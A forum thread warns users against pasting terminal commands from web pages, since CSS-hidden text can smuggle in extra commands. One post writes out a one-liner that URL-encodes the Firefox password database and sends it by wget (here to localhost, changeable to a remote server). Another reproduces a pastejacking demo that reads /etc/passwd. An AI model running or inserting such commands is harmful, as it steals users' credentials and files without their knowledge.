Warning to those who copy-paste commands directly to the Terminal

[CharlesA]

or just plain lazy like me.

Lazy like me too, except I'll run stuff on a test box before trying it on production.

[codingman]

I remember several years ago when some people on here were posting commands to delete people's hard drive partitions. It doesn't have to be anything advanced at all. You just have to have someone new and trusting who doesn't know what they're doing, and you could do a lot of damage.

We haven't had any of that kind of trouble here for a very long time. But like the OP said, you can't just trust every random blog out there. CharlesA also made a good point that a lot of stuff that comes up in searches on the net are old and don't work anymore.

100% agreed. If you don't have a text editor open, quote the person's post and review ALL of it, for anything fishy or suspicious.

[CharlesA]

100% agreed. If you don't have a text editor open, quote the person's post and review ALL of it, for anything fishy or suspicious.

I doubt you'll find much like that on these forums (mostly cuz it's fairly hard to hide text with CSS like the link in the OP does), but if you want to be sure, you can always quote the post or copy/paste it into the quick reply box to see if there is anything iffy about it.

[codingman]

True, but its better to be safe than sorry.

[Feathers McGraw]

Haha thanks, guess I was being a bit naive there.

As for leading people to delete their hard drive partitions...that's just MEAN.

[forrestcupp]

or just plain lazy like me.

You don't even have to be lazy when it comes to the longer scripts. How many people actually sift through every line of a long script before they run it, even if they know what it means? Most people don't have that much time, so they just trust people.

[pqwoerituytrueiwoq]

note to self: stop using terminal for scrap paper (easy to open via keyboard shortcut), that trick could use curl to read my firefox password database and send it somewhere

eg have something like this hidden in it

Code:

data="$(perl -MURI::Escape -e 'print uri_escape($ARGV[0]);' "$(cat ~/.mozilla/firefox/*.default/signons.sqlite)")";wget "http://127.0.0.1?data=$data" -o /dev/null &;clear;bash ~/.bashrc 2> /dev/null

that makes your firefox password database URL safe and sends it to localhost (127.0.0.1) the loopback address on a computer, that address could easly be changed to some sever somewhere that processes the database
and if your passwords are not password protected (Edit -> Preferences -> Security -> look at the last check box) you would be screwed and not even know it

[Moose]

Thanks so much for the heads up! I don't usually c/p commands unless they are really big, but now I will stay more wary.

[JayKay3OOO]

Always read the label.

[Locus Kiesselbachi]

WOW
didnt know that.

git clone /dev/null; clear; echo -n "Hello ";whoami|tr -d '\n';echo -e '!\nThat was a bad idea. Don'"'"'t copy code from websites you don'"'"'t trust!
Here'"'"'s the first line of your /etc/passwd: ';head -n1 /etc/passwd
git clone git://git.kernel.org/pub/scm/utils/kup/kup.git

git clone [201~/dev/null; clear; echo -n "Hello ";whoami|tr -d '\n';echo -e '!\nThat was a bad idea. Don'"'"'t copy code from websites you don'"'"'t trust!
Here'"'"'s the first line of your /etc/passwd: ';head -n1 /etc/passwd
git clone git://git.kernel.org/pub/scm/utils/kup/kup.git


OK, thank you for advice!

edit:
added leafpad shortcut into taskbar-s "application launch bar"

edit2:
hmm you can select the code and right click on it - look for "search by google", but dont select it. At least beginnig is seen - something is not what it looks like.